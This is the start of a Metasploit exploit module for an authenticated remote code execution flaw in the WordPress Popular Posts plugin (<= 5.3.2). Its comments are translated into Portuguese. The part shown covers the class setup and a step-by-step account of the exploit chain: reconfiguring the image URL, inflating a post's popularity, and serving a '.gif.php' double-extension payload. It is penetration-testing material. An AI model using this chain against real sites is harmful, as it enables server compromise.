
### Este módulo requer Metasploit: https://metasploit.com/download# Fonte atual: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ Este exploit requer que o Metasploit tenha um FQDN e a capacidade de executar um servidor web de payload nas portas 80, 443 ou 8080. O FQDN também não deve resolver para um endereço reservado (192/172/127/10). O servidor também deve responder a uma solicitação HEAD para o payload, antes de receber uma solicitação GET. Este exploit aproveita uma validação de entrada imprópria autenticada no plugin Wordpress Popular Posts <= 5.3.2. A cadeia de exploit é bastante complicada. A autenticação é necessária e 'gd' para PHP é necessário no servidor. Em seguida, o plugin Popular Post é reconfigurado para permitir uma URL arbitrária para a imagem do post no widget. Um post é feito, então solicitações são enviadas ao post para torná-lo mais popular do que o anterior #1 por 5. Uma vez que o post atinge o top 5, e após uma atualização de cache do servidor de 60 segundos (esperamos 90), o widget da página inicial é carregado o que aciona o plugin para baixar o payload do nosso servidor. Nosso payload tem um cabeçalho 'GIF' e uma extensão dupla ('.gif.php') permitindo que código PHP arbitrário seja executado. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # módulo msf 'Simone Cristofaro', # edb 'Jerome Bruandet' # análise original ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wo